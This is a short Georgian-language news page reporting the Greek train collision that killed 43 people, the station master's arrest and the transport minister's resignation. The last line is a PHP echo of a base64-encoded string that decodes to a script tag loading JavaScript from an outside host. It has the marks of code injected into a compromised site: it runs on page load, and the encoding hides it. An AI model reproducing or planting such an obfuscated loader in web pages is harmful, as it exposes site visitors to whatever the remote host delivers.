celsiusi
ავერსი შნაიდერი
საბერძნეთში სარკინიგზო კატასტროფის შედეგად დაღუპულთა რიცხვი 43-მდე გაიზარდა. ინფორმაციას „ბიბისი“ ავრცელებს.
როგორც ქვეყნის პრემიერ-მინისტრმა, კირიაკოს მიცოტაკისმა ტრაგედიის ადგილის მონახულების შემდეგ განაცხადა, ინციდენტის გამომწვევ მიზეზად ადამიანური ფაქტორი სახელდება.
დაკავებულია სადგურის ხელმძღვანელი, რომელსაც არაგანზრახ მკვლელობის ბრალდება აქვს წაყენებული. თუმცა, ეჭვმიტანილი ბრალეულობას უარყოფს და მომხდარს ტექნიკურ გაუმართაობას აბრალებს.
დატრიალებული ტრაგედიის ფონზე, თანამდებობიდან გადადგა ტრანსპორტის მინისტრი.
სატვირთო და სამგზავრო მატარებლები ერთმანეთს სამშაბათს შუაღამისას შეეჯახნენ, რის შედეგადაც მატარებლების შემადგენლობა ლიანდაგებიდან გადავიდა. სამგზავრო მატარებლის პირველ ორ ვაგონს ცეცხლი გაუჩნდა. საერთო ჯამში, სამგზავრო მატარებელს 350-მდე ადამიანი ათენიდან თესალონიკში გადაჰყავდა. ვარაუდობენ, რომ მგზავრთა უმეტესობა სტუდენტი იყო.
418
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");